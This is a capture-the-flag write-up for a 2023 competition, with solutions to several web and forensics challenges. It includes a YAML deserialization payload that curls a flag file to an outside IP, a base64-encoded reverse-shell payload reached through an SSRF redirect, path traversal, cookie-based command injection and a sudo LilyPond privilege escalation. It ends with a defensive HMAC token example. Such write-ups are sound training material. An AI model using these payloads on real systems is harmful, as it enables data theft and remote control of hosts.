ARCENT Best Cyber Warrior 2023
Quick challenge writeups for the CTF to explain the exploitation.
CyberCompose
Vulnerable to the YAML deserialization issue described in Rapid7's module entry: https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/
Payload:
!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']
Confuser
Vulnerable to the advisory GHSA-ffqj-6fqr-9h24: https://github.com/advisories/GHSA-ffqj-6fqr-9h24
Intruder
It was a hassle setting up my own HTTPS server for it, and I couldn't use self-signed certs because the vulnerable webserver did not have the insecure option enabled.
I was able to reach the YAML deserialization through the SSRF with this PHP redirect, which got the exploit working:
<?php header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>
S7R34M5
from scapy.all import IP, UDP, Raw, rdpcap
import sys

# take in the pcap file name from the first argument
file = sys.argv[1]

# Define the source and destination IP addresses of the covert stream
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"

# Define an array to store the data bytes
data_array = []
packets = rdpcap(file)

def process_packet(packet):
    # find all UDP packets from 192.168.245.129 to 192.168.1.7 that carry a payload
    # and collect their data bytes in order
    if (packet.haslayer(IP) and packet.haslayer(UDP) and packet.haslayer(Raw)
            and packet[IP].src == source_ip and packet[IP].dst == destination_ip):
        data_array.append(packet[Raw].load)

# Process each packet in the pcap file
for packet in packets:
    process_packet(packet)

# merge the array and print
data = b''.join(data_array)
print(data.decode('utf-8', errors='replace'))
LeakyPond
Initial Access
Path traversal: /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php
Debug mode was still enabled, and the page passed the value of the debug cookie straight to system().
RCE:
GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blue
Used the Ivan Sincek PHP reverse shell for a more stable environment.
Priv Esc
$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add
\version "2.23.82"
for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$
SayingPlease
Simply change the base64-encoded authentication token from user to admin, and the index.php page will display the flag.
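To show why that works and what the fix looks like, here is an added example (not code from the challenge) that models an unsigned base64 role token next to an HMAC-signed one; the token layout, the JSON payload and SECRET_KEY are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side secret for this example only; a real app loads it from config.
SECRET_KEY = b"example-secret-do-not-use"


def make_unsigned_token(role: str) -> str:
    """Token shaped like the challenge's: base64 of a JSON blob, no integrity check."""
    return base64.urlsafe_b64encode(json.dumps({"role": role}).encode()).decode()


def read_unsigned_token(token: str) -> str:
    """The weak check: whatever role the client encoded is trusted as-is."""
    return json.loads(base64.urlsafe_b64decode(token))["role"]


def swap_role(b64_payload: str, old: str, new: str) -> str:
    """Decode, replace the role text, re-encode (the edit the writeup describes)."""
    raw = base64.urlsafe_b64decode(b64_payload).decode()
    return base64.urlsafe_b64encode(raw.replace(old, new).encode()).decode()


def make_signed_token(role: str, key: bytes = SECRET_KEY) -> str:
    """Hardened form: payload plus an HMAC-SHA256 tag over the encoded payload."""
    payload = base64.urlsafe_b64encode(json.dumps({"role": role}).encode())
    sig = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + sig


def read_signed_token(token: str, key: bytes = SECRET_KEY):
    """Return the role only if the tag verifies; None for tampered or malformed tokens."""
    try:
        payload, sig = token.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload))["role"]


def tamper_signed(token: str, old: str, new: str) -> str:
    """Same role edit applied to a signed token: the old tag no longer matches."""
    payload, sig = token.rsplit(".", 1)
    return swap_role(payload, old, new) + "." + sig
```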